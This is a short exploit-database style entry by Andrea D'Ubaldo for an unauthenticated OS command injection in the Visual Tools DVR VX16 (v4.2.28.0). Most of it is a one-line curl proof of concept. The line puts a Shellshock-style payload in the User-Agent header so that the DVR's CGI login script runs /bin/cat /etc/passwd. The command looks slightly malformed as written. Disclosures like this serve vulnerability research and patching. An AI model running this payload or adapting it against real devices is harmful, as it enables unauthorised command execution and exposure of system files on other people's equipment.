Authored by Andrea D’Ubaldo

Visual Tools DVR VX16 version suffers from a command injection vulnerability.

# Exploit Title: Visual Tools DVR VX16 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage:
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux

# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/